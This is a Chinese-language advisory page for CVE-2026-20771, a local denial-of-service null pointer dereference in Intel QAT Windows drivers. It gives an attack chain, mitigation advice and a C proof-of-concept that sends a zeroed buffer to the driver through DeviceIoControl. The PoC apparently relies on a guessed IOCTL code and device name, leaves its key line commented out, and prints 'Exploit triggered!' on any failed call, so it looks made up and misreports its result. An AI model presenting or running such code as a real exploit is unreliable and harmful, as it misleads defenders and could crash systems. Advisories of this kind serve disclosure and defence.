CVE-2026-20771 CVSS 6.1 中危

CVE-2026-20771 Intel QAT驱动空指针解引漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-20771

漏洞类型

空指针解引用

CVSS评分

6.1 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Intel(R) QAT software drivers

漏洞概述

该漏洞是Intel QAT软件Windows驱动程序版本1.13之前的一个安全缺陷。由于Ring 3用户应用程序中存在空指针解引用问题，经过身份验证的低权限攻击者可通过本地访问发起低复杂度攻击，成功利用可能导致系统拒绝服务。此漏洞无需用户交互，对系统机密性影响较低，但对可用性影响较高。

技术细节

该漏洞的根源在于Intel QAT软件驱动程序在处理Ring 3用户应用程序请求时，对关键指针参数缺乏严格的非空校验机制。具体而言，当低权限的攻击者调用受影响的驱动API接口时，可以通过精心构造的输入数据传递空指针或无效内存地址。驱动程序在未进行安全检查的情况下直接对该指针进行解引用操作，试图读取或写入内存。由于该操作发生在驱动层或相关的系统调用上下文中，这种非法访问会立即触发系统异常，导致驱动崩溃甚至引发蓝屏（BSOD），从而实现拒绝服务攻击。整个过程无需用户交互，攻击成本较低。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的低权限用户访问权限。

STEP 2

步骤2

攻击者编写恶意程序，调用Intel QAT驱动程序Ring 3接口的特定API。

STEP 3

步骤3

向该API传递包含空指针的恶意参数，绕过基础校验。

STEP 4

步骤4

驱动程序解引用空指针，触发系统异常，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdio.h>

// Simulated IOCTL code for the vulnerable function
#define VULNERABLE_IOCTL 0x222003

int main() {
    // Attempt to open the device handle
    HANDLE hDevice = CreateFileA("\\\\.\\IntelQATDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }

    // Prepare input buffer simulating the null pointer dereference trigger
    // The vulnerable driver expects a valid pointer but receives NULL/invalid data
    BYTE inBuffer[1024];
    memset(inBuffer, 0, sizeof(inBuffer));
    
    // Manipulate buffer to pass NULL pointer equivalent to the driver
    // Offset depends on specific driver structure
    // *(DWORD*)(inBuffer + 0x10) = 0; 

    DWORD bytesReturned;
    BOOL result = DeviceIoControl(
        hDevice,
        VULNERABLE_IOCTL,
        inBuffer, sizeof(inBuffer), // Input buffer
        NULL, 0,                    // Output buffer
        &bytesReturned,
        NULL
    );

    if (!result) {
        printf("Exploit triggered! DeviceIoControl failed with error: %d\n", GetLastError());
        // Expected behavior: System crash or BSOD due to null pointer dereference
    } else {
        printf("Call succeeded, vulnerability not triggered.\n");
    }

    CloseHandle(hDevice);
    return 0;
}

影响范围

Intel(R) QAT software drivers for Windows < 1.13

防御指南

临时缓解措施

建议立即更新至修复后的驱动版本；若无法更新，应严格限制本地用户权限，禁止不可信应用程序运行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表